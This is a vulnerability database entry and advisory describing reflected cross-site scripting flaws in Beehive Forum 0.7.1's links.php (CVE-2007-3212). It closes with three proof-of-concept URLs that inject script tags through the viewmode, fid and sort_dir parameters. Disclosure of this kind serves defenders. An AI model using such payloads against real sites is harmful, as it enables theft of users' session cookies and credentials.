Beehive Forum 0.7.1 - 'links.php' Multiple Cross-Site Scripting Vulnerabilities

Author: Ory Segal
type: webapps
platform: php
port: 
date_added: 2007-06-11  
date_updated: 2013-12-10  
verified: 1  
codes: CVE-2007-3212;OSVDB-36380  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 30170.txt  
source: https://www.securityfocus.com/bid/24413/info

Beehive Forum is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.

An attacker may leverage any of these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

Beehive Forum 0.71 is vulnerable; other versions may also be affected.

http://www.example.com/forum/links.php?webtag=FORUM_NAME&fid=1&viewmode=>".><script>alert(1);</script> http://www.example.com/forum/links.php?webtag=FOEUM_NAME&fid=>".><script>alert(1);</script>&viewmode=1 http://www.example.com/forum/links.php?webtag=FORUM_NAME&fid=1&viewmode=0&page=1&sort_by=CREATED&sort_dir="><script>alert(1)</script>